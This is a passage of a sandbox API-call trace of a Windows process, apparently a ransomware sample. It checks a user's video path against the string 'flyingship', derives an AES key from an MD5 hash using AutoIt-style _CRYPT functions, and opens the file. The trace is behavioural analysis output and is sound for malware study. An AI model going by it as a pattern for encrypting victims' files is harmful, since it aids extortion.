dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tYY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YY6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.233] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ipHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pHJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HJEO8.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0192.234] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.234] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0192.234] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0192.234] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0192.234] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0192.234] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.234] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.234] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.234] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0192.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc71b0f80, ftCreationTime.dwHighDateTime=0x1d5e0cb, ftLastAccessTime.dwLowDateTime=0xf8e453b0, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xf8e453b0, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0xc1eb, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="IipHJEO8.mp4", cAlternateFileName="")) returned 0x90af58 [0192.235] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0192.235] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.235] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.235] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.235] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.235] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.235] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.235] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0192.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0192.236] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.236] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.236] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.236] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.236] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0192.236] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.236] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0192.237] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.237] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.237] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0192.238] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.238] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.238] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0192.238] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.238] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0192.238] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.238] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.238] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0192.239] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.239] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.239] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.239] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.239] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.239] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.239] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.239] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.240] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.240] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.240] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.240] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.240] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0192.240] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.240] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.240] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.241] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.241] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.241] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0192.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.241] CryptDestroyHash (hHash=0x90ae18) returned 1 [0192.241] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.241] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.241] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.241] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.241] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\iiphjeo8.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0192.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.242] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0192.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0192.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0192.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0192.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0192.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0192.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0192.242] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.242] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0192.243] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0192.243] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0192.243] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0192.243] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.243] 